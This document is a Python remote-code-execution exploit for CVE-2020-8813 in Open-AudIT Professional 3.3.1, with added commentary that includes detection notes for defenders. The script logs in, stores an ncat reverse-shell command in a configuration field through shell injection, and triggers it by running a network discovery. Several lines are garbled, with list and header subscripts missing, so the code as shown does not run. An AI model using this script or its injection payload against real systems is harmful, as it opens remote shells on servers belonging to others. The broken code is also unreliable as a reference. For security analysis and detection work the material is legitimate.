# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
# Date: 2020-04-22
# Exploit Author: Askar
# CVE: CVE-2020-8813
# Vendor Homepage: https://opmantek.com/
# Version: v3.3.1
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
# bs4 emits a UserWarning about the parser choice; the script pins
# "html5lib" explicitly further down, so the warning is just noise here.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
# argv[0] plus five positional arguments: target URL, a valid Open-AudIT
# account, and the listener address/port the injected command connects to.
# Note that this is an *authenticated* exploit: without working
# credentials the PATCH below is never reached.
if len(sys.argv) != 6:
    print("~ Usage : ./openaudit-exploit.py url username password ip port")
    exit()
# NOTE(review): `sys.argv1` etc. are attribute lookups, not list indexing;
# the subscripts appear to have been lost when this listing was extracted,
# so as written these lines fail. The same artifact shows up in
# start_discovery() on the findAll(...) and req.headers lines.
url = sys.argv1
username = sys.argv2
password = sys.argv3
ip = sys.argv4
port = sys.argv5
# One session object so the cookie obtained by login() is reused by the
# configuration PATCH and the discovery requests.
request = requests.session()
def inject_payload():
    """Store a shell command string in Open-AudIT configuration item 90.

    Sends a JSON:API-style PATCH on the already logged-in session to
    ``/en/omk/open-audit/configuration/90``. The ``value`` attribute is a
    command fragment wrapped in ``;`` and using ``${IFS}`` in place of
    spaces, i.e. it is shaped to be interpreted by a shell rather than
    stored as plain configuration; the header attributes this to
    CVE-2020-8813. Nothing in this function executes the command — that
    happens when a discovery is later run (see start_discovery()).

    Detection notes for defenders: a PATCH to ``/configuration/<id>``
    whose ``value`` contains ``;``, ``${IFS}`` or a network tool name is a
    high-fidelity indicator; so is an outbound connection from the
    Open-AudIT host to an arbitrary ``ip:port`` shortly after a
    configuration change. The response is not checked, so the success
    message below is printed regardless of what the server returned.
    """
    configuration_path = url+"/en/omk/open-audit/configuration/90"
    # %s placeholders are the listener ip and port from argv; no quoting or
    # validation is applied to either.
    data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
    request.patch(configuration_path, data)
    print("+ Payload injected in settings")
def start_discovery():
    """Create a network discovery and immediately execute it.

    Flow, as visible in the code:
      1. GET the discovery creation form and parse it with BeautifulSoup
         to obtain the form's access token (anti-CSRF token).
      2. POST a minimal subnet discovery (hard-coded ``10.10.10.1/24``,
         randomised 10-letter name) to ``/en/omk/open-audit/discoveries``
         with redirects disabled so the new resource's ``Location`` header
         can be read.
      3. GET ``<Location>/execute`` to run the discovery, which — per the
         exploit header, not anything shown here — is where the value
         stored by inject_payload() is passed to a shell.

    Detection notes for defenders: a discovery created and executed within
    seconds of a PATCH to ``/configuration/``, with a name consisting of
    10 uppercase letters, matches this script's footprint; so does the web
    server's user spawning a shell or a network tool during a discovery.

    No return value; failures are not checked (a missing ``Location``
    header or a login that silently expired would surface as an exception
    or as a no-op rather than a clear error).
    """
    discovery_path = url+"/en/omk/open-audit/discoveries/create"
    post_discovery_path = url+"/en/omk/open-audit/discoveries"
    # Random name so repeated runs do not collide on an existing discovery.
    scan_name = "".join(random.choice(string.ascii_uppercase) for i in range(10))
    req = request.get(discovery_path)
    response = req.text
    soup = BeautifulSoup(response, "html5lib")
    # Reads the token from one of the form's <input> elements; the index
    # subscript appears garbled by extraction, see the note near argv.
    token = soup.findAll('input')5.get("value")
    # NOTE(review): `buttons` is never used.
    buttons = soup.findAll("button")
    # Referer is set to the create page, presumably because the server
    # checks it alongside the access token — TODO confirm.
    headers = {"Referer" : discovery_path}
    # Form fields mirror the discovery creation form; only name, subnet,
    # type and the access token carry meaningful values, the rest are
    # defaults or empty. Key names here look flattened (brackets lost).
    request_data = {
        "dataattributesname":scan_name,
        "dataattributesothersubnet":"10.10.10.1/24",
        "dataattributesotherad_server":"",
        "dataattributesotherad_domain":"",
        "submit":"",
        "datatype":"discoveries",
        "dataaccess_token":token,
        "dataattributescomplete":"y",
        "dataattributesorg_id":"1",
        "dataattributestype":"subnet",
        "dataattributesdevices_assigned_to_org":"",
        "dataattributesdevices_assigned_to_location":"",
        "dataattributesothernmapdiscovery_scan_option_id":"1",
        "dataattributesothernmapping":"y",
        "dataattributesothernmapservice_version":"n",
        "dataattributesothernmapopen|filtered":"n",
        "dataattributesothernmapfiltered":"n",
        "dataattributesothernmaptiming":"4",
        "dataattributesothernmapnmap_tcp_ports":"0",
        "dataattributesothernmapnmap_udp_ports":"0",
        "dataattributesothernmaptcp_ports":"22,135,62078",
        "dataattributesothernmapudp_ports":"161",
        "dataattributesothernmaptimeout":"",
        "dataattributesothernmapexclude_tcp_ports":"",
        "dataattributesothernmapexclude_udp_ports":"",
        "dataattributesothernmapexclude_ip":"",
        "dataattributesothernmapssh_ports":"22",
        "dataattributesothermatchmatch_dbus":"",
        "dataattributesothermatchmatch_fqdn":"",
        "dataattributesothermatchmatch_dns_fqdn":"",
        "dataattributesothermatchmatch_dns_hostname":"",
        "dataattributesothermatchmatch_hostname":"",
        "dataattributesothermatchmatch_hostname_dbus":"",
        "dataattributesothermatchmatch_hostname_serial":"",
        "dataattributesothermatchmatch_hostname_uuid":"",
        "dataattributesothermatchmatch_ip":"",
        "dataattributesothermatchmatch_ip_no_data":"",
        "dataattributesothermatchmatch_mac":"",
        "dataattributesothermatchmatch_mac_vmware":"",
        "dataattributesothermatchmatch_serial":"",
        "dataattributesothermatchmatch_serial_type":"",
        "dataattributesothermatchmatch_sysname":"",
        "dataattributesothermatchmatch_sysname_serial":"",
        "dataattributesothermatchmatch_uuid":""
    }
    print("+ Creating discovery ..")
    # allow_redirects=False: the redirect target (Location) is the URL of
    # the newly created discovery and is needed to build the execute URL.
    req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
    # (Variable name is misspelled in the original; header subscript is
    # garbled by extraction as noted above.)
    disocvery_url = url + req.headers'Location' + "/execute"
    print("+ Triggering payload ..")
    print("+ Check your nc ;)")
    # Running the discovery is the trigger; the response is discarded.
    request.get(disocvery_url)
def login():
    """Authenticate the shared session against the Open-AudIT login form.

    Posts ``username``/``password`` (from argv) to
    ``/en/omk/open-audit/login`` with a ``redirect_url`` back to the app.

    Returns:
        bool: ``False`` only when the response body contains the phrase
        ``"There was an error authenticating"``; any other response counts
        as success, so a changed error message or an unexpected page would
        be reported as a successful login and fail later instead.

    For defenders: the whole chain depends on a valid account, so the
    practical exposure is bounded by credential hygiene and by how many
    users may edit configuration items. Failed logins followed by a
    configuration PATCH from the same source are worth correlating.
    """
    login_info = {
        "redirect_url": "/en/omk/open-audit",
        "username": username,
        "password": password
    }
    login_request = request.post(url+"/en/omk/open-audit/login", login_info)
    login_text = login_request.text
    # Error detection is a substring match on the returned HTML only; the
    # HTTP status code is not consulted.
    if "There was an error authenticating" in login_text:
        return False
    else:
        return True
# Entry point: authenticate, store the command in configuration item 90,
# then create and execute a discovery to trigger it. Each step is
# sequential on the same session and none of them checks the server's
# response, so partial failures are only visible on the listener side.
if login():
    print("+ LoggedIn Successfully")
    inject_payload()
    start_discovery()
else:
    print("- Cannot login!")
